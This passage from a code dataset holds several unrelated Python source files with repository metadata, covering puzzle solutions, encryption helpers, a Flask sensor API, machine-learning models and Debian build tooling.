domain[i].isdigit():\n continue\n else:\n return False\n \n if 1 < len(extension) <= 3:\n for i in range(len(extension)):\n if extension[i].isalpha():\n continue\n else:\n return False\n else: return False\n\n return True\n\ndef filter_mail(emails):\n return list(filter(fun, emails))\n\nif __name__ == '__main__':\n n = int(input())\n emails = []\n for _ in range(n):\n emails.append(input())\n\nfiltered_emails = filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)","repo_name":"uki-a/hackerrank","sub_path":"validating_email.py","file_name":"validating_email.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38123507111","text":"import base64\nimport logging\nimport traceback\n\nfrom Crypto.Cipher import AES\nfrom cryptography.fernet import Fernet\n\nlog = logging.getLogger(\"formshare\")\n\n\ndef old_decode_data_with_key(data, key): # pragma: no cover\n \"\"\"\n Old decode code based on PyCrypto. Here only to migrate 2.0.0 versions\n of FormShare to new versions\n :param data: Data to encrypt\n :param key: Key to use\n :return:\n \"\"\"\n byte_padding = b\"|\"\n\n def decode_aes(c, e):\n return c.decrypt(base64.b64decode(e)).rstrip(byte_padding)\n\n cipher = AES.new(key, 1)\n return decode_aes(cipher, data)\n\n\ndef encode_data(request, data):\n key = request.registry.settings[\"aes.key\"].encode()\n key = base64.b64encode(key)\n f = Fernet(key)\n if not isinstance(data, bytes):\n data = data.encode()\n return f.encrypt(data)\n\n\ndef decode_data(request, data):\n key = request.registry.settings[\"aes.key\"].encode()\n key = base64.b64encode(key)\n f = Fernet(key)\n try:\n return f.decrypt(data)\n except Exception as e:\n log.error(\"Error when decrypting a password. Error: {}\".format(str(e)))\n return \"\"\n\n\ndef encode_data_with_key(data, key):\n key = base64.b64encode(key)\n f = Fernet(key)\n if not isinstance(data, bytes):\n data = data.encode()\n return f.encrypt(data)\n\n\ndef decode_data_with_key(data, key):\n key = base64.b64encode(key)\n f = Fernet(key)\n try:\n return f.decrypt(data)\n except Exception as e:\n log.error(\"Error when decrypting a password. Error: {}\".format(str(e)))\n log.error(traceback.format_exc())\n return \"\"\n","repo_name":"qlands/FormShare","sub_path":"formshare/config/encdecdata.py","file_name":"encdecdata.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"74556397286","text":"from flask import Flask, request, jsonify\nfrom flask.ext.pymongo import PyMongo\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'sensor_monitor'\napp.config['MONGO_URI'] = 'mongodb://:@ds259325.mlab.com:59325/sensor_monitor'\n\nmongo = PyMongo(app)\n\n@app.route(\"/\")\ndef hello():\n return \"

Hello There!
    \"\n\n@app.route('/add',methods=['POST'])\ndef add():\n content = request.json\n var1 = content['var1']\n var2 = content['var2']\n print(\"var1\", var1)\n print(\"var2\", var2)\n\n if var1 and var2:\n user = mongo.db.users\n user.insert({'var1': var1, 'var2': var2})\n return jsonify({'success': '1'})\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"alejocram/SensorMonitorServer","sub_path":"sensor_monitor.py","file_name":"sensor_monitor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27726659840","text":"import torch\nimport torch.nn as nn\n\nfrom models.conv_lstm import ConvLSTM\nfrom models.unet import Unet\nfrom utils.spatial_transform import SpatialTransformer\n\n\nclass Unet_ConvLSTM(nn.Module):\n def __init__(self, image_size):\n super(Unet_ConvLSTM, self).__init__()\n self.image_size = image_size\n self.ndims = len(image_size)\n\n enc_nf = [16, 32, 32, 32]\n dec_nf = [32, 32, 32, 32, 32, 16, 16]\n self.unet = Unet(inshape=image_size, infeats=2, nb_features=[enc_nf, dec_nf])\n\n # configure unet to flow field layer\n Conv = getattr(nn, 'Conv%dd' % self.ndims)\n self.flow = Conv(self.unet.final_nf, self.ndims, kernel_size=3, padding=1)\n\n self.rnn = ConvLSTM(input_dim=2, hidden_dim=2, kernel_size=(3, 3), num_layers=1, batch_first=False)\n self.spatial_transformer = SpatialTransformer(size=image_size)\n\n def forward(self, images, labels=None):\n\n # shape of imgs/lbs: (seq_size, bs, 1, W, H)\n # shape of unet_out: (seq_size - 1, bs, 2, W, H)\n unet_out = torch.cat(\n [self.flow(self.unet(torch.cat([src, trg], dim=1))).unsqueeze(0)\n for src, trg in zip(images[:-1], images[1:])], dim=0)\n\n rnn_out, last_states = self.rnn(unet_out)\n h, c = last_states[0]\n\n # shape of flows: (seq_size - 1, bs, 2, W, H)\n flows = rnn_out[0].permute(1, 0, 2, 3, 4)\n\n # shape of moved_images = (seq_size - 1, bs, 1, W, H)\n moved_images = torch.cat(\n [self.spatial_transformer(src, flow).unsqueeze(0) for src, flow in zip(images[:-1], flows[:])], dim=0)\n\n if labels is not None:\n moved_labels = torch.cat(\n [self.spatial_transformer(src, flow).unsqueeze(0) for src, flow in zip(labels[:-1], flows[:])], dim=0)\n return [moved_images, moved_labels, flows]\n else:\n return [moved_images, flows]\n","repo_name":"Armin-Saadat/rnn-registration-old","sub_path":"models/unet_convlstm.py","file_name":"unet_convlstm.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"29536483767","text":"import argparse\nfrom pathlib import Path\nfrom algorithms import Search_Algorithms as sa\n\n'''\nEach variable read in from *.var will be put into a dictionary. \nThe domain, constraint relationships, and number of constraints can be accessed by provided the letter as the key in any dict.\n'''\n\n\ndef main():\n # Command Line Parser\n parser = argparse.ArgumentParser()\n # Positional Arguments\n parser.add_argument(\"variables\",\n help=\"Path to a .var file that holds variable info\",\n type=Path\n )\n parser.add_argument(\"constraints\",\n help=\"Path to a .con file that holds constraint info\",\n type=Path\n )\n parser.add_argument(\"consistency_enforcing\",\n help=\"none|fc are the choices. none is for backtracking. 
fc is for forward checking.\"\n )\n # Parse input\n args = parser.parse_args()\n\n # Getting variable data from .var file if path exists\n if args.variables.exists() and args.variables.is_file():\n # Looping thru file\n domains = {} # Holds domain of each variable\n letters = {} # Holds letter for each, to be used with constraints. Value is a number to be used like an index\n with args.variables.open() as f:\n for idx, line in enumerate(f):\n v = line.split()\n l = v.pop(0).split(\":\").pop(0) # Removing first element, then getting the letter\n letters[l] = idx\n v = [int(x) for x in v] # Converting all ints from string to int TODO optimize\n domains[l] = v\n else:\n print(\"Please provide a .var file that exists. Make sure you are not just providing a directory.\")\n exit()\n\n # Getting constraint data from .var file if path exists\n if args.constraints.exists() and args.constraints.is_file():\n # Looping thru file\n constraints = {} # Holds constraint relationships\n for l in letters:\n t = []\n for i in letters:\n t.append(0)\n constraints[l] = t # put in a list with len equal to amount of letters into dict value\n with args.constraints.open() as f:\n for line in f:\n cons = line.split()\n if cons[0] in letters and cons[2] in letters: \n left_key = cons[0] # Key for dict\n right_key = cons[2]\n left_index = letters[cons[0]]\n right_index = letters[cons[2]]\n op = cons[1]\n constraints[left_key][right_index] = op\n if op == \"<\":\n constraints[right_key][left_index] = \">\"\n elif op == \">\":\n constraints[right_key][left_index] = \"<\"\n else:\n constraints[right_key][left_index] = op\n else: \n print(\"Constraint file contains variable names that are not in the variable file. Please make sure you are inputing the correct and matching paths.\")\n exit()\n else:\n print(\"Please provide a .con file that exists. Make sure you are not just providing a directory.\")\n exit()\n\n # Counting number of constraints for each letter\n num_con = {}\n for key, list in constraints.items():\n num_con[key] = len(list) - list.count(0)\n \n # Creating dictionaries for domains, constraints and num of constraints. Letters array will hold the keys for each.\n\n # Init Search Algorithms\n solver = sa(letters, domains, constraints, num_con)\n\n # Getting enforcement setting from command line\n if args.consistency_enforcing == \"none\": solver.backtracking() # Call backtracking solver\n elif args.consistency_enforcing == \"fc\": solver.forward_checking() # Call forward checking solver\n else:\n print(\"Please provide an option for the consistency enforcement. 
The choices are none and fc.\")\n exit()\n\n \n\n \n \n \n\nif __name__ == '__main__':\n main()\n","repo_name":"codeCollision4/constraint-satisfaction-problem-solver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41628956438","text":"#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\n# } Driver Code Ends\n#User function Template for python3\nfrom typing import List\nclass Node:\n def __init__(self):\n self.child = [None] * 26\n\ndef insert(s, root):\n for i in range(len(s)):\n if root.child[ord(s[i]) - ord('a')]:\n root = root.child[ord(s[i]) - ord('a')]\n else:\n root.child[ord(s[i]) - ord('a')] = Node()\n root = root.child[ord(s[i]) - ord('a')]\n\ndef find(root, s):\n for i in range(len(s)):\n if root.child[ord(s[i]) - ord('a')]:\n root = root.child[ord(s[i]) - ord('a')]\n else:\n return False\n return True\n\nclass Solution:\n def prefixSuffixString(self, s1: List[str], s2: List[str]) -> int:\n t1, t2 = Node(), Node()\n for it in s1:\n insert(it, t1)\n insert(it[::-1], t2)\n \n cnt = 0\n for it in s2:\n ok = False\n if find(t1, it) or find(t2, it[::-1]):\n cnt += 1\n return cnt\n\n\n\n\n#{ \n # Driver Code Starts.\n\nif __name__==\"__main__\":\n for _ in range(int(input())):\n s1 = list(map(str, input().split()))\n s2 = list(map(str, input().split()))\n obj=Solution()\n print(obj.prefixSuffixString(s1, s2))\n# } Driver Code Ends","repo_name":"akashprap/Coding-Problems","sub_path":"Medium/Prefix Suffix String/prefix-suffix-string.py","file_name":"prefix-suffix-string.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19054062180","text":"import math\nimport numpy as np\nimport random\n\n\ndef python_sigmoid(number):\n return 1 / (1 + math.exp(-number))\n\n\ndef beta_scale(j, N):\n foo = N - 2\n return python_sigmoid(10 * ((2 * j - foo) / foo))\n\n\ndef tf_beta_scale(j, N):\n import tensorflow as tf\n foo = N - 2\n return tf.nn.sigmoid(10 * ((2 * j - foo) / foo))\n\n\ndef gamma_sigmoid(j, k, gamma_0, gamma_1):\n return gamma_1 + (gamma_0 - gamma_1) * (1 - python_sigmoid(10 * ((2 * j - k) / k)))\n\n\ndef tf_gamma_sigmoid(j, k, gamma_0, gamma_1):\n import tensorflow as tf\n return gamma_1 + (gamma_0 - gamma_1) * (1 - tf.nn.sigmoid(10 * ((2 * j - k) / k)))\n\n\ndef gamma_decay(j, N, gamma_1, gamma_2):\n scale = (j - 8) / (N - 9)\n return 1 - math.exp((1 - scale) * math.log(1 - gamma_1) + scale * math.log(1 - gamma_2))\n\n\ndef tf_gamma_decay(j, N, gamma_1, gamma_2):\n import tensorflow as tf\n scale = (j - 8) / (N - 9)\n return 1 - tf.math.exp((1 - scale) * tf.math.log(1 - gamma_1) + scale * tf.math.log(1 - gamma_2))\n\n\ndef get_policy(j, N, max_beta=.3, gamma_0=.9999, gamma_1=0.997, gamma_2=.99):\n if j == 0:\n beta = 0.\n gamma = gamma_0\n elif j >= N - 1:\n beta = max_beta\n gamma = gamma_decay(j, N, gamma_1, gamma_2)\n else:\n beta = max_beta * beta_scale(j, N)\n if j < 7:\n gamma = gamma_sigmoid(j, 6, gamma_0, gamma_1)\n elif j == 7:\n gamma = gamma_1\n else:\n gamma = gamma_decay(j, N, gamma_1, gamma_2)\n return beta, gamma\n\n\ndef tf_get_policy(j, N, dtype, max_beta=.3, gamma_0=.9999, gamma_1=0.997, gamma_2=.99):\n import tensorflow as tf\n max_beta = tf.convert_to_tensor(max_beta, dtype)\n gamma_0 = tf.convert_to_tensor(gamma_0, dtype)\n gamma_1 = tf.convert_to_tensor(gamma_1, dtype)\n gamma_2 = 
tf.convert_to_tensor(gamma_2, dtype)\n beta = max_beta * tf_beta_scale(j, N)\n beta = tf.where(j >= N - 1., tf.cast(tf.fill(j.shape, max_beta), dtype), beta)\n beta = tf.where(j == 0., tf.zeros_like(beta), beta)\n gamma = tf_gamma_decay(j, N, gamma_1, gamma_2)\n gamma = tf.where(j == 7., tf.cast(tf.fill(j.shape, gamma_1), dtype), gamma)\n gamma = tf.where(j < 7., tf_gamma_sigmoid(j, 6., gamma_0, gamma_1), gamma)\n gamma = tf.where(j == 0., tf.cast(tf.fill(j.shape, gamma_0), dtype), gamma)\n return beta, gamma\n\n\nclass MAB:\n\n def __init__(self, N, epsilon, beta, window_size):\n self.N = N\n self.epsilon = epsilon\n self.beta = beta\n self.window_size = window_size\n self.rewards = np.zeros(N)\n self.counts = np.zeros(N)\n self.window = []\n self.k = 0\n\n def save(self, root, print_exception=False):\n print(\"Saving\")\n try:\n import json\n import os\n os.makedirs(root, exist_ok=True)\n with open(root + \"mab.json\", 'w') as file:\n json.dump({\"mab\": self.window, \"k\": self.k}, file)\n return True\n except Exception as e:\n if print_exception:\n print(e)\n return False\n\n def load(self, root):\n import json\n import os\n if os.path.isfile(root + \"mab.json\"):\n with open(root + \"mab.json\", 'r') as file:\n data = json.load(file)\n self.window = data['mab']\n self.k = data['k']\n for elm in self.window:\n arm, reward = elm\n self.counts[arm] += 1\n self.rewards[arm] += reward\n return True\n return False\n\n def greed(self):\n den = self.counts + 1e-10\n ranks = np.divide(self.rewards, den)\n self.k -= 1\n return int(np.argmax(ranks))\n\n def ucb(self):\n num = math.log(min(self.k - 1, self.window_size))\n den = self.counts + 1e-10\n ucb = self.beta * np.sqrt(np.divide(num, den))\n ranks = ucb + np.divide(self.rewards, den)\n return int(np.argmax(ranks))\n\n def get_j(self):\n if self.k < self.N:\n return self.k\n if random.random() < self.epsilon:\n return random.randint(0, self.N - 1)\n return self.ucb()\n\n def update_reward(self, arm, reward):\n self.counts[arm] += 1\n self.rewards[arm] += reward\n self.window.append((arm, reward))\n self.k += 1\n if len(self.window) > self.window_size:\n arm, reward = self.window.pop(0)\n self.counts[arm] -= 1\n self.rewards[arm] -= reward\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n\n N = 32\n betas = []\n gammas = []\n indicies = []\n for j in range(N):\n indicies.append(j)\n b, g = get_policy(j, N)\n betas.append(b)\n gammas.append(g)\n plt.plot(indicies, betas, 'bs')\n plt.show()\n plt.plot(indicies, gammas, 'bs')\n plt.show()\n print(gammas)\n","repo_name":"Bjacobwork/AnotherAgent57","sub_path":"bandit/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38196922693","text":"\nfrom django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index),\n path('terminals/new', views.terminals_new),\n path('terminals//edit', views.terminals_edit),\n path('terminals/', views.terminals_page),\n path('terminals', views.terminals_all),\n path('states/', views.states_page),\n path('states', views.states_all),\n path('about', views.about_page),\n path('chatbot', views.chatbot_page),\n]\n","repo_name":"thedejijoseph/travelinfo-app","sub_path":"browser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3761261541","text":"import pygame\nclass Chooser():\n \"\"\" 选择面板初始化\"\"\"\n def __init__(self,screen):\n #加载图片以及设定位置\n self.screen = screen\n self.image = pygame.image.load('resource\\Cards\\ChooserBackground.png')\n self.screen_rect = self.screen.get_rect()\n self.rect = self.image.get_rect()\n\n self.rect.left = self.screen_rect.left\n self.rect.top = self.screen_rect.top\n\n ###选择的项目\n self.card_cherrybomb_image = pygame.image.load('resource\\Cards\\card_cherrybomb.png')\n self.card_snowpea_image = pygame.image.load('resource\\Cards\\card_snowpea.png')\n self.card_threepeashooter_image = pygame.image.load('resource\\Cards\\card_threepeashooter.png')\n\n self.card_cherrybomb_rect = self.card_cherrybomb_image.get_rect()\n self.card_snowpea_image_rect = self.card_snowpea_image.get_rect()\n self.card_threepeashooter_image_rect = self.card_threepeashooter_image.get_rect()\n \n def blitchooser(self):\n \"\"\" 绘制选择面板\"\"\"\n self.screen.blit(self.image,self.rect)\n\n def blitchooser_items(self):\n \"\"\" 绘制选择的选项\"\"\"\n \n\n\n\n self.card_cherrybomb_rect.left = self.screen_rect.left + 75 \n self.card_cherrybomb_rect.top = self.screen_rect.top\n\n self.card_snowpea_image_rect.left = self.card_cherrybomb_rect.left + self.card_snowpea_image_rect.width\n self.card_snowpea_image_rect.top = self.screen_rect.top\n\n self.card_threepeashooter_image_rect.left = self.card_snowpea_image_rect.left + self.card_threepeashooter_image_rect.width\n self.card_threepeashooter_image_rect.top = self.screen_rect.top\n\n \n\n\n\n self.screen.blit(self.card_cherrybomb_image,self.card_cherrybomb_rect)\n self.screen.blit(self.card_snowpea_image,self.card_snowpea_image_rect)\n self.screen.blit(self.card_threepeashooter_image,self.card_threepeashooter_image_rect)\n ","repo_name":"linxinloningg/PygameThunderfighter","sub_path":"chooser.py","file_name":"chooser.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2668067061","text":"import os\nimport myutils\n\nUDWORDS = {}\nEMPTIES = set()\nfor udPath in ['data/ud-treebanks-v' + myutils.UDversion + '.noEUD/', 'data/ud-treebanks-v2.extras.noEUD/']:\n for UDdir in os.listdir(udPath):\n if not (os.path.isdir(udPath + UDdir) and UDdir.startswith('UD')):\n continue\n train, dev, test = myutils.getTrainDevTest(udPath + UDdir)\n if not myutils.hasColumn(test, 1):\n #print('NOWORDS', test)\n continue\n if train == '':\n EMPTIES.add(udPath + UDdir)\n else:\n words = myutils.getWords(train)\n UDWORDS[udPath + UDdir] = set(words)\n\nPROXIES = {}\nfor UDdir in EMPTIES: \n _, _, test = myutils.getTrainDevTest(UDdir)\n testWords = myutils.getWords(test, 10)\n scores = {}\n for proxy in UDWORDS:\n scores[proxy] = myutils.getOverlap(testWords, UDWORDS[proxy])\n PROXIES[UDdir] = sorted(scores, key=scores.get, reverse=True)[0]\n\ndef pred(model,test, output, 
datasetID):\n evalFile = output + '.eval'\n isEmpty = (not os.path.isfile(output)) or (os.path.isfile(output) and os.stat(output).st_size == 0)\n #print(output, isEmpty, model!= '')\n if model != '' and isEmpty:\n cmd = ' '.join(['python3 predict.py', model, test, output, '--dataset ' + datasetID])\n print(cmd)\n\noutDir = 'preds' + myutils.UDversion + '/'\nif not os.path.isdir(outDir):\n os.mkdir(outDir)\n\nfor UDdir in list(UDWORDS) + list(EMPTIES):\n for seed in myutils.seeds:\n train, dev, test = myutils.getTrainDevTest(UDdir)\n \n datasetName = UDdir.split('/')[-1]\n datasetID = UDdir if train != '' else PROXIES[UDdir]\n datasetID = datasetID.split('/')[-1]\n\n for config in ['concat', 'concat.smoothed', 'sepDec.smoothed', 'datasetEmbeds.smoothed']:\n name = 'fullUD' + config + '.' + str(seed)\n model = myutils.getModel(name)\n output = outDir + name + '.' + datasetName + '.test.' + seed + '.conllu'\n pred(model, test, output, datasetID)\n\n model = myutils.getModel(datasetID + '.' + str(seed))\n output = outDir + 'self.' + datasetName + '.test.' + seed + '.conllu'\n pred(model, test, output, datasetID)\n\n\n","repo_name":"AngelFelipeMP/MultiTask-Learning-for-Toxic-Language-Classification","sub_path":"machamp/scripts/2.ud.pred.py","file_name":"2.ud.pred.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22643649357","text":"from resources.game_rule import games\nimport random\n\nclass LuckyNumbers():\n def __init__(self, game_num):\n # Defining the needed variables.\n self.game_num = game_num \n self.total_pick = int(games[self.game_num][\"Max_pick\"]) # This is the total number needs by the user which is currently 6.\n self.max_number = int(games[self.game_num][\"Max_number\"]) # This is the max number that can be chosen randomly.\n \n def generate_number(self):\n temp_numbers = [] # This will hold the randomly generated numbers.\n \n # This will add the generated numbers.\n while len(temp_numbers) < (self.total_pick):\n temp_numbers.append(random.randint(1, self.max_number))\n\n return temp_numbers","repo_name":"Pikasu12/lotto_number_generator","sub_path":"LuckyNumber.py","file_name":"LuckyNumber.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73690147048","text":"import torch\nimport torch.nn as nn\nfrom model import GreaseArgConfig, GreaseArgModel, GreaseArgPreTrainedModel\nfrom torch import Tensor\nfrom torch_geometric.data import Batch, Data\nfrom transformers.modeling_outputs import SequenceClassifierOutput\n\n\nclass GreaseArgClassificationTransform(nn.Module):\n def __init__(self, config: GreaseArgConfig) -> None:\n super().__init__()\n self.config = config\n input_size: int = 0\n\n if config.input_text:\n input_size += config.hidden_size\n if config.input_graph:\n input_size += config.gnn_hidden_size << 1\n\n self.dense = nn.Linear(input_size, config.hidden_size)\n self.tanh = nn.Tanh()\n self.output = nn.Linear(config.hidden_size, config.num_labels)\n\n self.dropout = nn.Dropout(\n config.classifier_dropout if config.classifier_dropout else config.hidden_dropout_prob\n )\n\n def forward(\n self, lm_x: Tensor | None = None, gnn_x: Tensor | None = None, ptr: Tensor | None = None\n ) -> Tensor:\n inputs = []\n if self.config.input_text:\n inputs.append(lm_x[:, 0])\n\n if self.config.input_graph:\n gin: list[Tensor] = []\n\n for i, j in zip(ptr[:-1], ptr[1:]):\n 
cur_gnn_x: Tensor = gnn_x[i:j, :]\n gin.append(cur_gnn_x[j - i - 2 :, :].view(1, -1))\n\n inputs.append(torch.cat(gin))\n\n x = torch.cat(inputs, dim=1)\n x = self.dense(x)\n x = self.tanh(x)\n x = self.dropout(x)\n x = self.output(x)\n return x\n\n\nclass GreaseArgModelForClassification(GreaseArgPreTrainedModel):\n def __init__(self, config: GreaseArgConfig):\n super().__init__(config)\n self.config = config\n\n self.grease_arg = GreaseArgModel(config)\n self.transform = GreaseArgClassificationTransform(config)\n self.loss = nn.CrossEntropyLoss()\n\n self.post_init()\n\n def forward(\n self,\n input_ids: Tensor | None = None,\n attention_mask: Tensor | None = None,\n graphs: list[Data] | None = None,\n mark: Tensor | None = None,\n labels: Tensor | None = None,\n ):\n if self.config.input_graph:\n graphs = Batch.from_data_list([graphs[i] for i in mark])\n\n lm_x, gnn_x = self.grease_arg(input_ids, attention_mask, graphs)\n\n logits = self.transform(lm_x, gnn_x, graphs.ptr if self.config.input_graph else None).view(\n -1, self.config.num_labels\n )\n\n loss = None if labels is None else self.loss(logits, labels)\n return SequenceClassifierOutput(loss=loss, logits=logits)\n","repo_name":"ljcleo/Hi-ArG","sub_path":"iam_cesc/finetune/model_finetune.py","file_name":"model_finetune.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30864173582","text":"#!/bin/python3\nimport math\n\n# Complete the squares function below.\ndef squares(a, b):\n\n# as naive brutal force approach to iterate through entire range and check if square root from every number is an integer leads to TLE\n\n# we can take left and right edges (a and b, respectively) \n\n# for right edge (b) take the square root and floor it down so we got the integer 'right_edge' which is in range ((sqrt(a), sqrt(b))\n# which means that square of this number is in range (a, b)\n\n# for left edge we ceil up sqrt(a) and get the integer 'left_edge' the same way\n\n# difference of these two integers results to a number of integers which lie in a range ((sqrt(a), sqrt(b))\n# therefore their squares definately lie in a range (a, b)\n\n left_edge = math.ceil(math.sqrt(a))\n right_edge = math.floor(math.sqrt(b))\n\n return (right_edge - left_edge + 1)\n \nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n ab = input().split()\n\n a = int(ab[0])\n\n b = int(ab[1])\n\n result = squares(a, b)\n\n print(result)\n\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n","repo_name":"iduseev/HACKERRANK-SOLUTIONS","sub_path":"algorithms/implementation/sherlock_and_squares/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12654242832","text":"from watchablemedia import WatchableMedia\n\n\nclass Movies(WatchableMedia):\n def __init__(self):\n super().__init__()\n self.video_type = None\n self.audio_type = None\n\n @classmethod\n def from_json(cls, data):\n instance = super().from_json(data)\n instance.video_type = data.get(\"video_type\")\n instance.audio_type = data.get(\"audio_type\")\n\n return instance\n","repo_name":"Datenlord1510/discord-predb","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} 
+{"seq_id":"37350024509","text":"import glob\nimport logging\nimport os\nimport shlex\nimport shutil\nimport subprocess\nimport time\nfrom collections import (\n OrderedDict,\n)\nfrom contextlib import suppress\nfrom tempfile import TemporaryDirectory\n\ntry:\n import typing\nexcept ImportError:\n pass\nelse:\n from typing import (\n Iterable,\n List,\n Mapping,\n Optional,\n Sequence,\n Set,\n Tuple,\n )\n typing # silence pyflakes\n Iterable\n List\n Mapping\n Optional\n Sequence\n Set\n Tuple\n\nfrom debian.changelog import (\n Changelog,\n)\nfrom debian.deb822 import (\n Changes,\n Deb822,\n Dsc,\n)\nfrom debian.debian_support import (\n Version,\n)\n\nfrom vectis.apt import (\n AptSource,\n)\nfrom vectis.autopkgtest import (\n run_autopkgtest,\n)\nfrom vectis.config import (\n Suite,\n)\nfrom vectis.error import (\n ArgumentError,\n CannotHappen,\n)\nfrom vectis.piuparts import (\n Binary,\n run_piuparts,\n)\nfrom vectis.util import (\n AtomicWriter,\n)\nfrom vectis.worker import (\n ContainerWorker,\n SchrootWorker,\n VirtWorker,\n)\n\nimport vectis.config\nvectis.config # noqa\n\nlogger = logging.getLogger(__name__)\n\n\nclass PbuilderWorker(ContainerWorker):\n\n def __init__(\n self,\n *,\n architecture, # type: str\n mirrors, # type: vectis.config.Mirrors\n suite, # type: vectis.config.Suite\n worker, # type: VirtWorker\n chroot=None, # type: Optional[str]\n components=(), # type: Sequence[str]\n extra_repositories=(), # type: Sequence[str]\n storage=None, # type: str\n tarball=None, # type: str\n ):\n # type: (...) -> None\n super().__init__(mirrors=mirrors, suite=suite)\n\n if tarball is None:\n assert storage is not None\n\n tarball = os.path.join(\n storage, architecture, str(suite.hierarchy[-1].vendor),\n str(suite.hierarchy[-1]), 'pbuilder.tar.gz')\n\n self.apt_related_argv = [] # type: Sequence[str]\n self.components = components\n self.__dpkg_architecture = architecture # type: str\n self.extra_repositories = extra_repositories\n self.tarball = tarball\n self.tarball_in_guest = None # type: Optional[str]\n self.worker = worker\n\n # We currently assume that copy_to_guest() works\n assert isinstance(self.worker, VirtWorker)\n\n @property\n def dpkg_architecture(self):\n return self.__dpkg_architecture\n\n def _open(self):\n super()._open()\n self.set_up_apt()\n\n def set_up_apt(self):\n self.tarball_in_guest = self.worker.make_file_available(\n self.tarball, cache=True)\n\n argv = []\n\n for ancestor in self.suite.hierarchy:\n if self.components:\n filtered_components = (\n set(self.components) & set(ancestor.all_components))\n else:\n filtered_components = ancestor.components\n\n uri = self.mirrors.lookup_suite(ancestor)\n\n source = AptSource(\n components=filtered_components,\n suite=ancestor.apt_suite,\n type='deb',\n trusted=ancestor.apt_trusted,\n uri=uri,\n )\n\n if ancestor is self.suite.hierarchy[-1]:\n logger.info(\n '%r: %s => --distribution %s --mirror %s '\n '--components %r',\n self, ancestor, source.suite,\n source.uri, ' '.join(source.components))\n argv.append('--distribution')\n argv.append(source.suite)\n argv.append('--mirror')\n argv.append(source.uri)\n argv.append('--components')\n argv.append(' '.join(source.components))\n else:\n logger.info(\n '%r: %s => --othermirror %s', self, ancestor, source)\n argv.append('--othermirror')\n argv.append(str(source))\n\n for line in self.extra_repositories:\n argv.append('--othermirror')\n argv.append(line)\n\n self.apt_related_argv = argv\n self.install_apt_keys()\n\n def install_apt_key(self, apt_key):\n 
self.apt_related_argv.append('--keyring')\n self.apt_related_argv.append(\n self.worker.make_file_available(apt_key))\n\n\nclass Buildable:\n\n def __init__(\n self,\n buildable, # type: str\n *,\n binary_version_suffix='', # type: str\n link_builds=(), # type: Iterable[str]\n orig_dirs=('..',), # type: Iterable[str]\n output_dir=None, # type: Optional[str]\n output_parent, # type: str\n vendor, # type: vectis.config.Vendor\n ):\n # type: (...) -> None\n\n self.buildable = buildable\n\n self._product_prefix = None\n self._source_version = None # type: Optional[Version]\n self._binary_version = None\n self.arch_wildcards = set() # type: Set[str]\n self.archs = [] # type: List[str]\n self.autopkgtest_failures = [] # type: List[str]\n self.binary_packages = [] # type: List[str]\n self.binary_version_suffix = binary_version_suffix\n self.changes_produced = {} # type: Mapping[str, str]\n self.dirname = None\n self.dsc = None\n self.dsc_name = None\n self.indep = False\n self.indep_together_with = None\n self.link_builds = link_builds\n self.logs = {} # type: Mapping[str, str]\n self.merged_changes = OrderedDict() # type: Mapping[str, str]\n self.nominal_suite = None\n self.orig_dirs = orig_dirs\n self.output_dir = output_dir\n self.piuparts_failures = [] # type: List[str]\n self.source_from_archive = False\n self.source_package = None # type: Optional[str]\n self.source_together_with = None\n self.sourceful_changes_name = None\n self.suite = None\n self.vendor = vendor\n\n if os.path.exists(self.buildable):\n if os.path.isdir(self.buildable):\n path = os.path.join(self.buildable, 'debian', 'changelog')\n changelog = Changelog(open(path))\n self.source_package = changelog.get_package()\n self.nominal_suite = changelog.distributions\n self._source_version = Version(changelog.version)\n control = os.path.join(self.buildable, 'debian', 'control')\n\n if len(changelog.distributions.split()) != 1:\n raise ArgumentError(\n 'Cannot build for multiple distributions at once')\n\n for paragraph in Deb822.iter_paragraphs(open(control)):\n self.arch_wildcards |= set(\n paragraph.get('architecture', '').split())\n binary = paragraph.get('package')\n\n if binary 